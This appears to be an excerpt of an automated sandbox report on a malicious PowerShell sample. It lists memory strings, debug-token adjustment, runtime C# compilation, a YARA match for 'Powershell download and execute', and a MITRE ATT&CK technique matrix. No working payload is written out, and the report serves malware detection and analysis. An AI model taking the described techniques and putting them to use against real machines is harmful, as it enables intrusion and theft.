    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wtKAUNhJPdfRIqluSzTyHxSZtOyVNDYqTBljtrqxTiqeSNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNr
    Source: ModuleAnalysisCache.0.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wwDWPUbkzYNAtizAWSiIGtOTFvSraPEIxlWPWqvLCrPAlwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenI
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: weBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkjrVNZCVmNFGWhVNVupZyyqeZtEZyxZZOPNxZnCLlnlRriMuHylblVbuxUPiipuhmehfIZZTUdNfw
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNrZTTYdXHYgtyFaBoOjepDzzkBAGWAtRGAHrPbcljfmvLV
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wJjVemwrdrdzGJxhtAqtdUOBpIDLrALQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkj
    Source: powershell.exe, 00000000.00000002.2806803037.000001B2B4554000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wJbglpYmoYIwASoKyXGRoKcihJXQBvgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQzOmglXXQHFPyauAwvDwtHuSIRjlXQcRrWfOxMdWgDjXuVTdMURZuMzzVQnLfLSmITIbTiuUVLvz
    Source: ModuleAnalysisCache.0.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWB
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJ
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29CA18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wHdEtoFQMEZQVTeCXISgeBCCELijddizqGSrHpdPbUFWQvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDt
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell download and execute
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
